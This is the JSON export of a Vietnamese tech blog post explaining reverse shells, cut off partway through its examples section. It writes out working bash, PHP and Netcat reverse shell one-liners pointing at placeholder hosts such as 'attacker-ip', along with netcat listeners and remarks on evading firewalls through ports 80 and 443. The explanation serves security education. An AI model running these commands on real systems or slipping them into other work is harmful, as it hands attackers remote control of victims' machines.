{"id":86370,"date":"2025-04-26T18:30:12","date_gmt":"2025-04-26T11:30:12","guid":{"rendered":"https:\/\/itviec1.uptech.vn\/?p=86370"},"modified":"2025-04-26T18:32:35","modified_gmt":"2025-04-26T11:32:35","slug":"bash-reverse-shell-la-gi","status":"publish","type":"post","link":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/","title":{"rendered":"Bash reverse shell l\u00e0 g\u00ec: C\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng reverse shell hi\u1ec7u qu\u1ea3"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_85 counter-hierarchy ez-toc-counter ez-toc-grey ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">N\u1ed9i dung b\u00e0i vi\u1ebft<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/#Bash_reverse_shell_la_gi\" >Bash reverse shell l\u00e0 g\u00ec?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/#Cach_reverse_shell_hoat_dong\" >C\u00e1ch reverse shell ho\u1ea1t \u0111\u1ed9ng<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/#Mot_vai_vi_du_cua_reverse_shell\" >M\u1ed9t v\u00e0i v\u00ed d\u1ee5 c\u1ee7a reverse shell<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/#Mot_so_tinh_huong_thuc_te_lien_quan_den_reverse_shell\" >M\u1ed9t s\u1ed1 t\u00ecnh hu\u1ed1ng th\u1ef1c t\u1ebf li\u00ean quan \u0111\u1ebfn reverse shell<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/#Cach_phat_hien_va_phong_chong_reverse_shell\" >C\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng reverse shell<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/#Cau_hoi_thuong_gap_ve_reverse_shell\" >C\u00e2u h\u1ecfi th\u01b0\u1eddng g\u1eb7p v\u1ec1 reverse shell<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/#Tong_ket\" >T\u1ed5ng k\u1ebft<\/a><\/li><\/ul><\/nav><\/div>\n<p><em><strong>Reverse shell l\u00e0 m\u1ed9t trong nh\u1eefng c\u00f4ng c\u1ee5 ph\u1ed5 bi\u1ebfn m\u00e0 c\u00e1c tin t\u1eb7c s\u1eed d\u1ee5ng \u0111\u1ec3 x\u00e2m nh\u1eadp v\u00e0 chi\u1ebfm quy\u1ec1n \u0111i\u1ec1u khi\u1ec3n h\u1ec7 th\u1ed1ng m\u1ee5c ti\u00eau. V\u1edbi nh\u1eefng \u0111\u1eb7c \u0111i\u1ec3m tinh vi v\u00e0 kh\u1ea3 n\u0103ng v\u01b0\u1ee3t qua c\u00e1c c\u01a1 ch\u1ebf b\u1ea3o m\u1eadt, reverse shell tr\u1edf th\u00e0nh m\u1ed9t th\u00e1ch th\u1ee9c l\u1edbn \u0111\u1ed1i v\u1edbi vi\u1ec7c b\u1ea3o v\u1ec7 h\u1ec7 th\u1ed1ng. B\u00e0i vi\u1ebft d\u01b0\u1edbi \u0111\u00e2y s\u1ebd ch\u1ec9 ra c\u00e1c t\u00ecnh hu\u1ed1ng th\u1ef1c t\u1ebf li\u00ean quan \u0111\u1ebfn l\u1ed7 h\u1ed7ng reverse shell, v\u00ed d\u1ee5 nh\u01b0 bash reverse shell, v\u00e0 c\u00e1ch ph\u00f2ng ch\u1ed1ng, n\u1ebfu b\u1ea1n mu\u1ed1n t\u00ecm hi\u1ec3u v\u1ec1 b\u1ea3o m\u1eadt h\u1ec7 th\u1ed1ng th\u00ec \u0111\u1eebng b\u1ecf qua nh\u00e9.<\/strong><\/em><\/p>\n<p><span style=\"font-weight: 400;\">\u0110\u1ecdc b\u00e0i vi\u1ebft n\u00e0y \u0111\u1ec3 hi\u1ec3u r\u00f5 h\u01a1n v\u1ec1:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Bash reverse shell l\u00e0 g\u00ec?<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">M\u1ed9t s\u1ed1 v\u00ed d\u1ee5 v\u1ec1 reverse shell<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">M\u1ed9t s\u1ed1 t\u00ecnh hu\u1ed1ng th\u1ef1c t\u1ebf v\u1ec1 reverse shell<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">C\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng<\/span><\/li>\n<\/ul>\n<h2><span class=\"ez-toc-section\" id=\"Bash_reverse_shell_la_gi\"><\/span><b>Bash reverse shell l\u00e0 g\u00ec?<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><span style=\"font-weight: 400;\"><strong>Bash reverse shell l\u00e0 m\u1ed9t d\u1ea1ng reverse shell s\u1eed d\u1ee5ng Bash<\/strong> (shell ph\u1ed5 bi\u1ebfn tr\u00ean c\u00e1c h\u1ec7 th\u1ed1ng Unix\/Linux) \u0111\u1ec3 th\u1ef1c thi c\u00e1c l\u1ec7nh tr\u00ean m\u00e1y n\u1ea1n nh\u00e2n.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Reverse shell l\u00e0 m\u1ed9t k\u1ef9 thu\u1eadt t\u1ea5n c\u00f4ng cho ph\u00e9p k\u1ebb t\u1ea5n c\u00f4ng thi\u1ebft l\u1eadp k\u1ebft n\u1ed1i t\u1eeb m\u00e1y m\u1ee5c ti\u00eau \u0111\u1ebfn m\u00e1y c\u1ee7a h\u1ecd, ng\u01b0\u1ee3c v\u1edbi m\u1ed9t shell th\u00f4ng th\u01b0\u1eddng. Trong khi shell th\u00f4ng th\u01b0\u1eddng (forward shell) y\u00eau c\u1ea7u ng\u01b0\u1eddi d\u00f9ng k\u1ebft n\u1ed1i \u0111\u1ebfn m\u00e1y t\u1eeb xa, th\u00ec reverse shell ho\u1ea1t \u0111\u1ed9ng theo h\u01b0\u1edbng ng\u01b0\u1ee3c l\u1ea1i &#8211; khi m\u1ed9t Bash reverse shell \u0111\u01b0\u1ee3c thi\u1ebft l\u1eadp, m\u00e1y n\u1ea1n nh\u00e2n s\u1ebd k\u1ebft n\u1ed1i l\u1ea1i v\u1edbi m\u00e1y c\u1ee7a k\u1ebb t\u1ea5n c\u00f4ng v\u00e0 cung c\u1ea5p quy\u1ec1n \u0111i\u1ec1u khi\u1ec3n t\u1eeb xa th\u00f4ng qua Bash. Th\u00f4ng th\u01b0\u1eddng, k\u1ebft n\u1ed1i n\u00e0y \u0111\u01b0\u1ee3c th\u1ef1c hi\u1ec7n qua giao th\u1ee9c TCP, \u0111\u00f4i khi c\u00f3 th\u1ec3 s\u1eed d\u1ee5ng c\u00e1c giao th\u1ee9c kh\u00e1c nh\u01b0 ICMP ho\u1eb7c UDP.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">\u0110\u00e2y l\u00e0 c\u00e1ch \u0111\u1ec3 k\u1ebb t\u1ea5n c\u00f4ng chi\u1ebfm quy\u1ec1n \u0111i\u1ec1u khi\u1ec3n m\u00e1y n\u1ea1n nh\u00e2n m\u00e0 kh\u00f4ng b\u1ecb c\u00e1c c\u00f4ng c\u1ee5 b\u1ea3o m\u1eadt nh\u01b0 t\u01b0\u1eddng l\u1eeda ph\u00e1t hi\u1ec7n, c\u0169ng kh\u00f4ng c\u1ea7n ph\u1ea3i tr\u1ef1c ti\u1ebfp truy c\u1eadp v\u00e0o h\u1ec7 th\u1ed1ng. Do \u0111\u00f3, reverse shell l\u00e0 c\u00f4ng c\u1ee5 r\u1ea5t m\u1ea1nh m\u1ebd v\u00e0 nguy hi\u1ec3m, v\u00ec khi ki\u1ec3m so\u00e1t \u0111\u01b0\u1ee3c m\u00e1y n\u1ea1n nh\u00e2n, k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 \u0111\u00e1nh c\u1eafp d\u1eef li\u1ec7u, l\u00e2y nhi\u1ec5m ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i ho\u1eb7c leo thang quy\u1ec1n truy c\u1eadp \u0111\u1ec3 t\u1ea5n c\u00f4ng c\u00e1c h\u1ec7 th\u1ed1ng kh\u00e1c trong m\u1ea1ng c\u1ee7a n\u1ea1n nh\u00e2n.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Tuy nhi\u00ean, Bash reverse shell c\u00f3 th\u1ec3 b\u1ecb ph\u00e1t hi\u1ec7n v\u00e0 ng\u0103n ch\u1eb7n n\u1ebfu h\u1ec7 th\u1ed1ng \u0111\u01b0\u1ee3c b\u1ea3o v\u1ec7 \u0111\u00fang c\u00e1ch, \u0111\u1eb7c bi\u1ec7t l\u00e0 khi s\u1eed d\u1ee5ng c\u00e1c c\u00f4ng c\u1ee5 gi\u00e1m s\u00e1t v\u00e0 ph\u00f2ng ng\u1eeba hi\u1ec7u qu\u1ea3.<\/span><\/p>\n<blockquote><p><em>\u0110\u1ecdc th\u00eam: <a href=\"https:\/\/itviec.com\/blog\/bash-shell-la-gi\/\" target=\"_blank\" rel=\"noopener\"><strong>Bash Shell l\u00e0 g\u00ec? C\u00e1c t\u00ednh n\u0103ng ch\u00ednh c\u1ee7a Bash Shell<\/strong><\/a><\/em><\/p><\/blockquote>\n<h2><span class=\"ez-toc-section\" id=\"Cach_reverse_shell_hoat_dong\"><\/span><b>C\u00e1ch reverse shell ho\u1ea1t \u0111\u1ed9ng<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<ol>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>K\u1ebb t\u1ea5n c\u00f4ng chu\u1ea9n b\u1ecb m\u00e1y ch\u1ee7:<\/b><span style=\"font-weight: 400;\"> K\u1ebb t\u1ea5n c\u00f4ng thi\u1ebft l\u1eadp m\u00e1y c\u1ee7a m\u00ecnh \u0111\u1ec3 ch\u1edd \u0111\u00f3n k\u1ebft n\u1ed1i t\u1eeb m\u00e1y n\u1ea1n nh\u00e2n tr\u00ean m\u1ed9t c\u1ed5ng c\u1ee5 th\u1ec3. Th\u01b0\u1eddng th\u00ec k\u1ebb t\u1ea5n c\u00f4ng s\u1eed d\u1ee5ng c\u00f4ng c\u1ee5 nh\u01b0 Netcat \u0111\u1ec3 t\u1ea1o m\u1ed9t m\u00e1y ch\u1ee7 ch\u1edd nh\u1eadn k\u1ebft n\u1ed1i.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>M\u00e1y n\u1ea1n nh\u00e2n k\u1ebft n\u1ed1i l\u1ea1i<\/b><span style=\"font-weight: 400;\">: Thay v\u00ec m\u00e1y t\u1ea5n c\u00f4ng ch\u1ee7 \u0111\u1ed9ng k\u1ebft n\u1ed1i v\u00e0o m\u00e1y n\u1ea1n nh\u00e2n, m\u00e1y n\u1ea1n nh\u00e2n s\u1ebd t\u1ef1 \u0111\u1ed9ng k\u1ebft n\u1ed1i l\u1ea1i v\u1edbi m\u00e1y c\u1ee7a k\u1ebb t\u1ea5n c\u00f4ng. Vi\u1ec7c n\u00e0y c\u00f3 th\u1ec3 th\u1ef1c hi\u1ec7n th\u00f4ng qua m\u1ed9t payload (m\u00e3 t\u1ea5n c\u00f4ng) \u0111\u01b0\u1ee3c \u0111\u01b0a v\u00e0o h\u1ec7 th\u1ed1ng n\u1ea1n nh\u00e2n qua c\u00e1c l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt. Payload n\u00e0y th\u01b0\u1eddng l\u00e0 m\u1ed9t l\u1ec7nh bash \u0111\u01a1n gi\u1ea3n nh\u01b0 <\/span><span style=\"font-weight: 400;\">bash -i &gt;&amp; \/dev\/tcp\/ATTACKER_IP\/PORT 0&gt;&amp;1<\/span><span style=\"font-weight: 400;\"> ho\u1eb7c c\u00e1c bi\u1ebfn th\u1ec3 c\u1ee7a n\u00f3.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>\u0110i\u1ec1u khi\u1ec3n m\u00e1y n\u1ea1n nh\u00e2n t\u1eeb xa<\/b><span style=\"font-weight: 400;\">: Sau khi k\u1ebft n\u1ed1i \u0111\u01b0\u1ee3c thi\u1ebft l\u1eadp, k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 s\u1eed d\u1ee5ng shell (v\u00ed d\u1ee5: Bash shell) \u0111\u1ec3 \u0111i\u1ec1u khi\u1ec3n m\u00e1y n\u1ea1n nh\u00e2n t\u1eeb xa, th\u1ef1c hi\u1ec7n c\u00e1c h\u00e0nh \u0111\u1ed9ng nh\u01b0 sao ch\u00e9p t\u1ec7p, thay \u0111\u1ed5i c\u1ea5u h\u00ecnh h\u1ec7 th\u1ed1ng ho\u1eb7c c\u00e0i \u0111\u1eb7t ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i. K\u1ebb t\u1ea5n c\u00f4ng s\u1ebd c\u00f3 quy\u1ec1n truy c\u1eadp v\u1edbi c\u00f9ng \u0111\u1eb7c quy\u1ec1n c\u1ee7a ti\u1ebfn tr\u00ecnh \u0111\u00e3 th\u1ef1c thi l\u1ec7nh reverse shell, n\u00ean n\u1ebfu l\u1ec7nh \u0111\u01b0\u1ee3c th\u1ef1c thi v\u1edbi quy\u1ec1n root, k\u1ebb t\u1ea5n c\u00f4ng s\u1ebd c\u00f3 quy\u1ec1n ki\u1ec3m so\u00e1t ho\u00e0n to\u00e0n h\u1ec7 th\u1ed1ng.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>V\u01b0\u1ee3t qua c\u00e1c bi\u1ec7n ph\u00e1p b\u1ea3o v\u1ec7<\/b><span style=\"font-weight: 400;\">: M\u1ed9t trong nh\u1eefng l\u00fd do khi\u1ebfn reverse shell tr\u1edf th\u00e0nh c\u00f4ng c\u1ee5 t\u1ea5n c\u00f4ng hi\u1ec7u qu\u1ea3 l\u00e0 n\u00f3 d\u1ec5 d\u00e0ng v\u01b0\u1ee3t qua c\u00e1c t\u01b0\u1eddng l\u1eeda v\u00e0 h\u1ec7 th\u1ed1ng <\/span><i><span style=\"font-weight: 400;\">NAT*<\/span><\/i><span style=\"font-weight: 400;\">. C\u00e1c t\u01b0\u1eddng l\u1eeda th\u01b0\u1eddng ch\u1ec9 ki\u1ec3m so\u00e1t k\u1ebft n\u1ed1i \u0111\u1ebfn (incoming connections), trong khi k\u1ebft n\u1ed1i ng\u01b0\u1ee3c (outgoing connection) th\u01b0\u1eddng kh\u00f4ng b\u1ecb ch\u1eb7n, gi\u00fap k\u1ebb t\u1ea5n c\u00f4ng d\u1ec5 d\u00e0ng thi\u1ebft l\u1eadp k\u1ebft n\u1ed1i t\u1eeb m\u00e1y n\u1ea1n nh\u00e2n m\u00e0 kh\u00f4ng b\u1ecb ph\u00e1t hi\u1ec7n. Ngo\u00e0i ra, k\u1ebft n\u1ed1i reverse shell th\u01b0\u1eddng s\u1eed d\u1ee5ng c\u00e1c c\u1ed5ng ph\u1ed5 bi\u1ebfn nh\u01b0 80 (HTTP) ho\u1eb7c 443 (HTTPS) \u0111\u1ec3 tr\u00e1nh b\u1ecb ph\u00e1t hi\u1ec7n, v\u00ec l\u01b0u l\u01b0\u1ee3ng tr\u00ean c\u00e1c c\u1ed5ng n\u00e0y th\u01b0\u1eddng \u0111\u01b0\u1ee3c cho ph\u00e9p trong h\u1ea7u h\u1ebft c\u00e1c m\u00f4i tr\u01b0\u1eddng m\u1ea1ng.<\/span><\/li>\n<\/ol>\n<p><b>* <\/b><b><i>NAT<\/i><\/b><b> (Network Address Translation)<\/b><span style=\"font-weight: 400;\">: l\u00e0 m\u1ed9t k\u1ef9 thu\u1eadt trong m\u1ea1ng m\u00e1y t\u00ednh, d\u00f9ng \u0111\u1ec3 thay \u0111\u1ed5i \u0111\u1ecba ch\u1ec9 IP trong c\u00e1c g\u00f3i tin khi ch\u00fang \u0111i qua m\u1ed9t b\u1ed9 \u0111\u1ecbnh tuy\u1ebfn ho\u1eb7c firewall. M\u1ee5c \u0111\u00edch ch\u00ednh c\u1ee7a NAT l\u00e0 cho ph\u00e9p nhi\u1ec1u thi\u1ebft b\u1ecb trong m\u1ed9t m\u1ea1ng n\u1ed9i b\u1ed9 (nh\u01b0 m\u1ea1ng gia \u0111\u00ecnh ho\u1eb7c m\u1ea1ng c\u00f4ng ty) s\u1eed d\u1ee5ng m\u1ed9t \u0111\u1ecba ch\u1ec9 IP c\u00f4ng c\u1ed9ng duy nh\u1ea5t \u0111\u1ec3 k\u1ebft n\u1ed1i v\u1edbi Internet.<\/span><\/p>\n<blockquote><p><em>\u0110\u1ecdc th\u00eam: <a href=\"https:\/\/itviec.com\/blog\/shell-script-la-gi\/\" target=\"_blank\" rel=\"noopener\"><strong>Shell script l\u00e0 g\u00ec: T\u1eeb A-Z v\u1ec1 c\u00f4ng c\u1ee5 d\u00f2ng l\u1ec7nh cho l\u1eadp tr\u00ecnh vi\u00ean<\/strong><\/a><\/em><\/p><\/blockquote>\n<h2><span class=\"ez-toc-section\" id=\"Mot_vai_vi_du_cua_reverse_shell\"><\/span><b>M\u1ed9t v\u00e0i v\u00ed d\u1ee5 c\u1ee7a reverse shell<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3><b>Bash reverse shell<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">\u0110\u00e2y l\u00e0 c\u00e1ch \u0111\u01a1n gi\u1ea3n nh\u1ea5t \u0111\u1ec3 t\u1ea1o reverse shell tr\u00ean c\u00e1c h\u1ec7 th\u1ed1ng Linux. K\u1ebb t\u1ea5n c\u00f4ng s\u1ebd kh\u1edfi t\u1ea1o m\u1ed9t listener (l\u00e0 m\u1ed9t c\u00f4ng c\u1ee5 ho\u1eb7c \u1ee9ng d\u1ee5ng m\u00e0 k\u1ebb t\u1ea5n c\u00f4ng s\u1eed d\u1ee5ng \u0111\u1ec3 &#8220;ch\u1edd \u0111\u00f3n&#8221; c\u00e1c k\u1ebft n\u1ed1i t\u1eeb m\u00e1y n\u1ea1n nh\u00e2n) tr\u00ean m\u00e1y c\u1ee7a m\u00ecnh v\u00e0 m\u00e1y n\u1ea1n nh\u00e2n s\u1ebd k\u1ebft n\u1ed1i l\u1ea1i v\u1edbi m\u00e1y t\u1ea5n c\u00f4ng. V\u00ed d\u1ee5:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Tr\u00ean m\u00e1y t\u1ea5n c\u00f4ng, kh\u1edfi t\u1ea1o listener:<\/span><\/li>\n<\/ul>\n<pre><span style=\"font-weight: 400;\">nc -nlvp 4444<\/span><\/pre>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Tr\u00ean m\u00e1y n\u1ea1n nh\u00e2n, ch\u1ea1y l\u1ec7nh sau \u0111\u1ec3 k\u1ebft n\u1ed1i l\u1ea1i v\u1edbi m\u00e1y t\u1ea5n c\u00f4ng:<\/span><\/li>\n<\/ul>\n<pre><span style=\"font-weight: 400;\">\/bin\/bash -i &gt;&amp; \/dev\/tcp\/attacker-ip\/4444 0&gt;&amp;1<\/span><\/pre>\n<p><span style=\"font-weight: 400;\">Khi l\u1ec7nh n\u00e0y \u0111\u01b0\u1ee3c th\u1ef1c thi, m\u00e1y n\u1ea1n nh\u00e2n s\u1ebd k\u1ebft n\u1ed1i l\u1ea1i v\u1edbi m\u00e1y t\u1ea5n c\u00f4ng, v\u00e0 k\u1ebb t\u1ea5n c\u00f4ng s\u1ebd c\u00f3 quy\u1ec1n \u0111i\u1ec1u khi\u1ec3n m\u00e1y n\u1ea1n nh\u00e2n th\u00f4ng qua shell. Trong \u0111\u00f3:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">-i<\/span><span style=\"font-weight: 400;\">: Ch\u1ea1y Bash \u1edf ch\u1ebf \u0111\u1ed9 t\u01b0\u01a1ng t\u00e1c, cho ph\u00e9p ng\u01b0\u1eddi t\u1ea5n c\u00f4ng g\u1eedi v\u00e0 nh\u1eadn l\u1ec7nh qua shell.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">&gt;&amp; \/dev\/tcp\/attacker-ip\/4444<\/span><span style=\"font-weight: 400;\">: \u0110\u00e2y l\u00e0 c\u00fa ph\u00e1p trong Bash \u0111\u1ec3 k\u1ebft n\u1ed1i t\u1edbi m\u00e1y t\u1ea5n c\u00f4ng. <\/span><span style=\"font-weight: 400;\">attacker-ip<\/span><span style=\"font-weight: 400;\"> l\u00e0 \u0111\u1ecba ch\u1ec9 IP c\u1ee7a m\u00e1y t\u1ea5n c\u00f4ng v\u00e0 4444 l\u00e0 c\u1ed5ng \u0111\u00e3 \u0111\u01b0\u1ee3c m\u1edf tr\u00ean m\u00e1y t\u1ea5n c\u00f4ng.<\/span><\/li>\n<\/ul>\n<h3><b>PHP reverse shell<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">\u0110\u00e2y l\u00e0 m\u1ed9t ph\u01b0\u01a1ng th\u1ee9c r\u1ea5t ph\u1ed5 bi\u1ebfn trong c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng v\u00e0o c\u00e1c m\u00e1y ch\u1ee7 web. N\u1ebfu m\u00e1y n\u1ea1n nh\u00e2n l\u00e0 m\u1ed9t m\u00e1y ch\u1ee7 web ch\u1ea1y PHP, k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 l\u1ee3i d\u1ee5ng PHP \u0111\u1ec3 t\u1ea1o m\u1ed9t reverse shell.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">V\u00ed d\u1ee5 khi th\u1ef1c thi l\u1ec7nh sau, m\u00e1y n\u1ea1n nh\u00e2n s\u1ebd k\u1ebft n\u1ed1i l\u1ea1i v\u1edbi m\u00e1y t\u1ea5n c\u00f4ng v\u00e0 cho ph\u00e9p k\u1ebb t\u1ea5n c\u00f4ng \u0111i\u1ec1u khi\u1ec3n m\u00e1y n\u1ea1n nh\u00e2n th\u00f4ng qua shell:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">php -r '$sock=fsockopen(\"attacker-ip\", 4444); exec(\"\/bin\/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3\");'<\/span><\/pre>\n<p><span style=\"font-weight: 400;\">Trong \u0111\u00f3:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">php -r<\/span><span style=\"font-weight: 400;\">: Ch\u1ea1y PHP tr\u1ef1c ti\u1ebfp t\u1eeb d\u00f2ng l\u1ec7nh m\u00e0 kh\u00f4ng c\u1ea7n ph\u1ea3i l\u01b0u v\u00e0o file.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">$sock=fsockopen(&#8220;attacker-ip&#8221;, 4444)<\/span><span style=\"font-weight: 400;\">: D\u00f9ng h\u00e0m fsockopen \u0111\u1ec3 k\u1ebft n\u1ed1i t\u1edbi \u0111\u1ecba ch\u1ec9 IP c\u1ee7a m\u00e1y t\u1ea5n c\u00f4ng (<\/span><span style=\"font-weight: 400;\">attacker-ip<\/span><span style=\"font-weight: 400;\">) qua c\u1ed5ng <\/span><b><i>4444<\/i><\/b><span style=\"font-weight: 400;\">.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">exec(&#8220;\/bin\/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&#8221;)<\/span><span style=\"font-weight: 400;\">: Thi h\u00e0nh l\u1ec7nh shell (<\/span><span style=\"font-weight: 400;\">\/bin\/sh<\/span><span style=\"font-weight: 400;\">) tr\u00ean m\u00e1y n\u1ea1n nh\u00e2n v\u00e0 chuy\u1ec3n c\u00e1c d\u00f2ng nh\u1eadp\/xu\u1ea5t c\u1ee7a shell t\u1edbi k\u1ebft n\u1ed1i v\u1edbi m\u00e1y t\u1ea5n c\u00f4ng.<\/span><\/li>\n<\/ul>\n<h3><b>Netcat reverse shell<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">Netcat l\u00e0 m\u1ed9t c\u00f4ng c\u1ee5 r\u1ea5t ph\u1ed5 bi\u1ebfn trong c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng m\u1ea1ng, \u0111\u1eb7c bi\u1ec7t l\u00e0 \u0111\u1ec3 t\u1ea1o k\u1ebft n\u1ed1i reverse shell. Netcat c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng \u0111\u1ec3 k\u1ebft n\u1ed1i m\u00e1y n\u1ea1n nh\u00e2n v\u1edbi m\u00e1y t\u1ea5n c\u00f4ng m\u1ed9t c\u00e1ch r\u1ea5t \u0111\u01a1n gi\u1ea3n. V\u00ed d\u1ee5:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Tr\u00ean m\u00e1y t\u1ea5n c\u00f4ng, k\u1ebb t\u1ea5n c\u00f4ng m\u1edf m\u1ed9t listener tr\u00ean c\u1ed5ng 4444:<\/span><\/li>\n<\/ul>\n<pre><span style=\"font-weight: 400;\">nc -nlvp 4444<\/span><\/pre>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Tr\u00ean m\u00e1y n\u1ea1n nh\u00e2n, k\u1ebb t\u1ea5n c\u00f4ng g\u1eedi m\u00e3 \u0111\u1ec3 m\u00e1y n\u1ea1n nh\u00e2n k\u1ebft n\u1ed1i l\u1ea1i qua Netcat:<\/span><\/li>\n<\/ul>\n<pre><span style=\"font-weight: 400;\">nc -e \/bin\/sh attacker-ip 4444<\/span><\/pre>\n<p><span style=\"font-weight: 400;\">Khi l\u1ec7nh n\u00e0y \u0111\u01b0\u1ee3c th\u1ef1c thi tr\u00ean m\u00e1y n\u1ea1n nh\u00e2n, m\u1ed9t k\u1ebft n\u1ed1i s\u1ebd \u0111\u01b0\u1ee3c thi\u1ebft l\u1eadp v\u1edbi m\u00e1y t\u1ea5n c\u00f4ng v\u00e0 k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 \u0111i\u1ec1u khi\u1ec3n m\u00e1y n\u1ea1n nh\u00e2n th\u00f4ng qua shell.<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">L\u01b0u \u00fd: M\u1ed9t s\u1ed1 phi\u00ean b\u1ea3n Netcat kh\u00f4ng h\u1ed7 tr\u1ee3 t\u00f9y ch\u1ecdn <\/span><span style=\"font-weight: 400;\">-e<\/span><span style=\"font-weight: 400;\">, trong tr\u01b0\u1eddng h\u1ee3p n\u00e0y, c\u00f3 th\u1ec3 